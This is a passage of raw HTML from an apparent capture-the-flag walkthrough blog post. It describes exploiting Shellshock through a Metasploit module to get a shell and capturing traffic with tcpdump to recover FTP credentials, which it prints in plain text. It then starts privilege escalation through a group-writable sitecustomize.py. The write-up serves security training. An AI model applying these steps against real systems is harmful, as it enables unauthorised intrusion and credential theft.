href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgtfkyQjwRZj1WEOhpeaXyIZKFANWEPO9cVv3e3DUZ80Ij9tQKzxcityn3a8701RPZdc5pccdPOjFlaj2KIyAcjLzSyHRH34Pdywk244RU6xrE6wkbz9AKnlEjg1keohuGr-t4b8HuYI2c1yI50cz2QwaTed9Iv4CSGG6hd47e3RopQsjhiItDKCqBYQA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;51&quot; data-original-width=&quot;684&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgtfkyQjwRZj1WEOhpeaXyIZKFANWEPO9cVv3e3DUZ80Ij9tQKzxcityn3a8701RPZdc5pccdPOjFlaj2KIyAcjLzSyHRH34Pdywk244RU6xrE6wkbz9AKnlEjg1keohuGr-t4b8HuYI2c1yI50cz2QwaTed9Iv4CSGG6hd47e3RopQsjhiItDKCqBYQA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Metasploit has some exploits related to &lt;b&gt;cgi &lt;/b&gt;script, for instance this one related to vulnerability &lt;b&gt;Shellshock&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.rapid7.com/db/modules/exploit/multi/http/apache_mod_cgi_bash_env_exec/&quot;&gt;https://www.rapid7.com/db/modules/exploit/multi/http/apache_mod_cgi_bash_env_exec/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEirfr35OGUPFxy62nDQ0deX_CMEc91pk5VVQF8O1XvjAkjWDVLb5JWtkJIRYtH6Me3_u6OLbsBquR2sR_ZOknZDvrTcyHmE1TUppcaWlquo-6IQjbBsLW3YIQM7HjM7Kx_2hGQSnTs4_h0Czbw6Xb6pgrv8i5mzWWm0d3hsRjFpSdGnYkUyfLjmmahCwQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;232&quot; data-original-width=&quot;982&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEirfr35OGUPFxy62nDQ0deX_CMEc91pk5VVQF8O1XvjAkjWDVLb5JWtkJIRYtH6Me3_u6OLbsBquR2sR_ZOknZDvrTcyHmE1TUppcaWlquo-6IQjbBsLW3YIQM7HjM7Kx_2hGQSnTs4_h0Czbw6Xb6pgrv8i5mzWWm0d3hsRjFpSdGnYkUyfLjmmahCwQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;- A Meterpreter session is triggered:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgTwAfAgRUryMsZrd26xqh-Ug-TmkVQTeMmDpr7zWCoMaGgEGKBWIG58gZne1o_DO2LBXPNGtGSc9Nd5-xJU1iynjAcrOCYy_S3LNCGmntzT-eDQqS24Qn2LbhGB9eBe4CpgUf_YhBAjrPnM9qzJxyf-BUM05uRXX2MOF5iamXvDxauIfLF1bc1ZFQaqg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;461&quot; data-original-width=&quot;980&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgTwAfAgRUryMsZrd26xqh-Ug-TmkVQTeMmDpr7zWCoMaGgEGKBWIG58gZne1o_DO2LBXPNGtGSc9Nd5-xJU1iynjAcrOCYy_S3LNCGmntzT-eDQqS24Qn2LbhGB9eBe4CpgUf_YhBAjrPnM9qzJxyf-BUM05uRXX2MOF5iamXvDxauIfLF1bc1ZFQaqg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Getting a shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhMRqLikJzuU1aZi8CaxgXiiH1dSMhpwzMePEanBR1Nd06l3K9mVZARvF8qpsQKj_PC8gv_AGLbOExNGOrE6S59q2zP7kNXsIlmv4RjKZKMIvRvgABSchoWr_f5COQXGFp8Y5iTvhHcSLWTUDKlF_1FOoFa4oFoRoXjVnLQjcvY9VPqGjEomm-plYzTVA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;208&quot; data-original-width=&quot;936&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhMRqLikJzuU1aZi8CaxgXiiH1dSMhpwzMePEanBR1Nd06l3K9mVZARvF8qpsQKj_PC8gv_AGLbOExNGOrE6S59q2zP7kNXsIlmv4RjKZKMIvRvgABSchoWr_f5COQXGFp8Y5iTvhHcSLWTUDKlF_1FOoFa4oFoRoXjVnLQjcvY9VPqGjEomm-plYzTVA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- One interesting thing about user &lt;b&gt;cerberus&lt;/b&gt; is that he belongs to group &lt;b&gt;pcap&lt;/b&gt;, as previous image shows.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So the right tools for reading &lt;b&gt;.pcap&lt;/b&gt;&amp;nbsp;files are &lt;b&gt;tcpdump&lt;/b&gt; and &lt;b&gt;Wireshark&lt;/b&gt;.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- First, running &lt;b&gt;tcpdump&lt;/b&gt; at local interface and saving to&lt;b&gt; file.pcap&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh85AL58FMpwodp5jobh6Bpxd5WQvgFl2i8_KBdmFnHY_8SJ_ql-agBtItIwT6Y2EgG2Uschrb3ZJzAe4Fc-gtDlH7FSTGWpr1rjqgY4CzIH5gJPxzFOW6rxU8bxxO048I-FljHf79qeKjqWBrE8oSAjiOQ6ne_fmal_p4ii1Z0TyIC_TOYRjZP8-P75Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;69&quot; data-original-width=&quot;392&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh85AL58FMpwodp5jobh6Bpxd5WQvgFl2i8_KBdmFnHY_8SJ_ql-agBtItIwT6Y2EgG2Uschrb3ZJzAe4Fc-gtDlH7FSTGWpr1rjqgY4CzIH5gJPxzFOW6rxU8bxxO048I-FljHf79qeKjqWBrE8oSAjiOQ6ne_fmal_p4ii1Z0TyIC_TOYRjZP8-P75Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgCwoANhvp_iuvnGTtiTbGAbQyfeqVVmfMozhkH0O6SJ4FLYeRz4WMTOYrU_NSrr4DBQxsM445j_R8nx_HXWzORjBYKi7npHwx-2NG1zYdbaQ1kxeDDwmY0nQhL-9PZEjpwU435SRCz7kpq5MjJ0E-O1-SL9v_XF33upKTC1vBHmeMRCnksuIjQ3TaYQQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;26&quot; data-original-width=&quot;561&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgCwoANhvp_iuvnGTtiTbGAbQyfeqVVmfMozhkH0O6SJ4FLYeRz4WMTOYrU_NSrr4DBQxsM445j_R8nx_HXWzORjBYKi7npHwx-2NG1zYdbaQ1kxeDDwmY0nQhL-9PZEjpwU435SRCz7kpq5MjJ0E-O1-SL9v_XF33upKTC1vBHmeMRCnksuIjQ3TaYQQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Now we&#39;ve got a &lt;b&gt;file.pcap&lt;/b&gt; that can be transferred to Kali to be analyzed with &lt;b&gt;Wireshark&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhcV1NqJGJDO6HWHVgRRQ_AtGGCRDdW4NlZzx-I9PRVVJ9EpP6Pi2MunJv2ZBwHWu831Q6Bdawe_8-4l-yAoQHW69nT6AL5PZVz-_4n8EMPFn8RjzHOPcLRUmlPiFySAV0GzpbWLmYeJNIVMwWQYefqANWwjM2FZWL92JwBYVzl4bWo_vf3wQH1YZ1qEA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;102&quot; data-original-width=&quot;615&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhcV1NqJGJDO6HWHVgRRQ_AtGGCRDdW4NlZzx-I9PRVVJ9EpP6Pi2MunJv2ZBwHWu831Q6Bdawe_8-4l-yAoQHW69nT6AL5PZVz-_4n8EMPFn8RjzHOPcLRUmlPiFySAV0GzpbWLmYeJNIVMwWQYefqANWwjM2FZWL92JwBYVzl4bWo_vf3wQH1YZ1qEA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhvuqo7DLEoNMk03Xx1x4iSfr8qt9l90d4fWwW3ON5tBrngjWBWF8VIu8BsjZPcf0ha16Prr4tD59ykEzCM3ttxf3vaSxud72CeUaOP-CwzA9Ro3Z7Z0Y2W3NmT9yJ06nQGkZaOLzwLx9GfPurDdBEKRgJT33kJClSpkt5_en2QTTX4SXGiK1YlXVE6fg&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;237&quot; data-original-width=&quot;714&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhvuqo7DLEoNMk03Xx1x4iSfr8qt9l90d4fWwW3ON5tBrngjWBWF8VIu8BsjZPcf0ha16Prr4tD59ykEzCM3ttxf3vaSxud72CeUaOP-CwzA9Ro3Z7Z0Y2W3NmT9yJ06nQGkZaOLzwLx9GfPurDdBEKRgJT33kJClSpkt5_en2QTTX4SXGiK1YlXVE6fg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Opening &lt;b&gt;file.pcap&lt;/b&gt; with Wireshark, putting a filter for FTP traffic and following the stream we discover credentials for user &lt;b&gt;hades&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjN_l8Nn2pH-sqX1Yjurg0vCcM7Shd86PYgAS-arncwDgwsKdBmAfACZi1BeMYse2v7QDTO_3w63SgR-UD_oR-nIHLIh8lSLlbycOW6NNg8dQj3nnW1l_Wiu_N9KZp7dHfHBkzdUgvxmHV9J3ZSTuqfpyq78TjdvF6kPMFBsQi-poWERmuGe8H_rrLKWw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;31&quot; data-original-width=&quot;404&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjN_l8Nn2pH-sqX1Yjurg0vCcM7Shd86PYgAS-arncwDgwsKdBmAfACZi1BeMYse2v7QDTO_3w63SgR-UD_oR-nIHLIh8lSLlbycOW6NNg8dQj3nnW1l_Wiu_N9KZp7dHfHBkzdUgvxmHV9J3ZSTuqfpyq78TjdvF6kPMFBsQi-poWERmuGe8H_rrLKWw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjlUVc4q4YfCx6Yw62Pu8CpVmHrhgN11wi2y5CjBYlBDhwyyvCjGikw8IR1qXW1NVeXiOrJ-pNNZqSLWLm2Ofx0kqGvAAqjwOBk59MXgxhjKlofhTapsdJKk8zAxB-eac9xmGBqEN1sYFfl7-JFRv8CwrugngGQDkjO9JhIu8luO6XizH9hJ3rsRyhmZA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;383&quot; data-original-width=&quot;1017&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjlUVc4q4YfCx6Yw62Pu8CpVmHrhgN11wi2y5CjBYlBDhwyyvCjGikw8IR1qXW1NVeXiOrJ-pNNZqSLWLm2Ofx0kqGvAAqjwOBk59MXgxhjKlofhTapsdJKk8zAxB-eac9xmGBqEN1sYFfl7-JFRv8CwrugngGQDkjO9JhIu8luO6XizH9hJ3rsRyhmZA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, we&amp;nbsp; can try SSH with these credentials:&amp;nbsp;&lt;b&gt;hades: PTpZTfU4vxgzvRBE&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhlP1F0ZwZ_HImDbt7z5UmpUt8nVhQqHJDTZ83Mi-kp47sjnmiM0UN9Rm_6kOfFSHFW-_aWZ9O-qRIrOm5_XCnAZ08q8nJRnR14_vSMktkctrZ0bu68RPAv5yX3jjJ3xtGDckTXtKvDMguaS5bgx-v5WRgVIDzLNEkcKA6pmV3uxClEHu_SnmHya3NcsQ&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;324&quot; data-original-width=&quot;904&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhlP1F0ZwZ_HImDbt7z5UmpUt8nVhQqHJDTZ83Mi-kp47sjnmiM0UN9Rm_6kOfFSHFW-_aWZ9O-qRIrOm5_XCnAZ08q8nJRnR14_vSMktkctrZ0bu68RPAv5yX3jjJ3xtGDckTXtKvDMguaS5bgx-v5WRgVIDzLNEkcKA6pmV3uxClEHu_SnmHya3NcsQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The new user hades belongs to group &lt;b&gt;gods&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiD7_psYFjST2bo4EPlsly9iSQ8mfXauRGQ6nxbe0bvadUpowj-3rHTpnkEeVnTia8VpOkAps0dPR5ja6x9lOk6LcTlimhV8CKwjE3PP0UcFZk7mdSXUEgq1Qn02AaoL8xIrICIg62GwhUfWgW3LMcMMj1wQuSGlYD4bORVWHdSrSR0HmiQD6NcwZQeBA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;49&quot; data-original-width=&quot;676&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiD7_psYFjST2bo4EPlsly9iSQ8mfXauRGQ6nxbe0bvadUpowj-3rHTpnkEeVnTia8VpOkAps0dPR5ja6x9lOk6LcTlimhV8CKwjE3PP0UcFZk7mdSXUEgq1Qn02AaoL8xIrICIg62GwhUfWgW3LMcMMj1wQuSGlYD4bORVWHdSrSR0HmiQD6NcwZQeBA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Let&#39;s find files owned by group &lt;b&gt;gods&lt;/b&gt;, for instance &lt;b&gt;sitecustomize.py&lt;/b&gt; has root privileges:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiHvW3Lv60mE0imhyr6iliL1_Jy9oiIMoGhuJzzs1yR-uoMRlqdVdhZL3Ad6oj1c7G06ecisZdupfL2hwxkFtTlxafapEisnOVT1EGJliF_U8ZCKJZ_OiNmi4GxKyEBH6ZgEeaUAV3LPwT5Lpk5_dGBzu_aNl0qRaPEIJzxFhj-NY5x-BIHz-2LqmJSuQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;23&quot; data-original-width=&quot;612&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiHvW3Lv60mE0imhyr6iliL1_Jy9oiIMoGhuJzzs1yR-uoMRlqdVdhZL3Ad6oj1c7G06ecisZdupfL2hwxkFtTlxafapEisnOVT1EGJliF_U8ZCKJZ_OiNmi4GxKyEBH6ZgEeaUAV3LPwT5Lpk5_dGBzu_aNl0qRaPEIJzxFhj-NY5x-BIHz-2LqmJSuQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgls5qDaJDd-FF4dsn7YvLEfOTGAtV7dhBCS-gT7asxH8WxUrHdNLl3BZ8vHGAUM9NtuhjtLwBXzmSATNxO20LtyxNfbaXB5Agpx7GZfA8xV9rPmihZNhvkwAaxUnsuraK2T4FPyqh-sOU6PTaSWObuAXDBGMAeyuDKbaWybt4EfYyUR3cjkrIDuMIDkg&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;24&quot; data-original-width=&quot;1125&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgls5qDaJDd-FF4dsn7YvLEfOTGAtV7dhBCS-gT7asxH8WxUrHdNLl3BZ8vHGAUM9NtuhjtLwBXzmSATNxO20LtyxNfbaXB5Agpx7GZfA8xV9rPmihZNhvkwAaxUnsuraK2T4FPyqh-sOU6PTaSWObuAXDBGMAeyuDKbaWybt4EfYyUR3cjkrIDuMIDkg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjJvOlUu72jO62e3jJogvM8LN4vBfNixi88YwFnsV0y_GblNnRjXwQqrUYXad65cuMsD-Uj_tHa0hmWD3QsfDUXoPAZgCZ7UP4VLfnfJb-fUBxrl1T6ZaD8T31WvJ_OUzg9KsujEgnShmOWVawpCjk42nXdEIQNhp1j2JG2TQzDXyLpzysQtj-Ul68j2A&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;49&quot; data-original-width=&quot;811&quot; 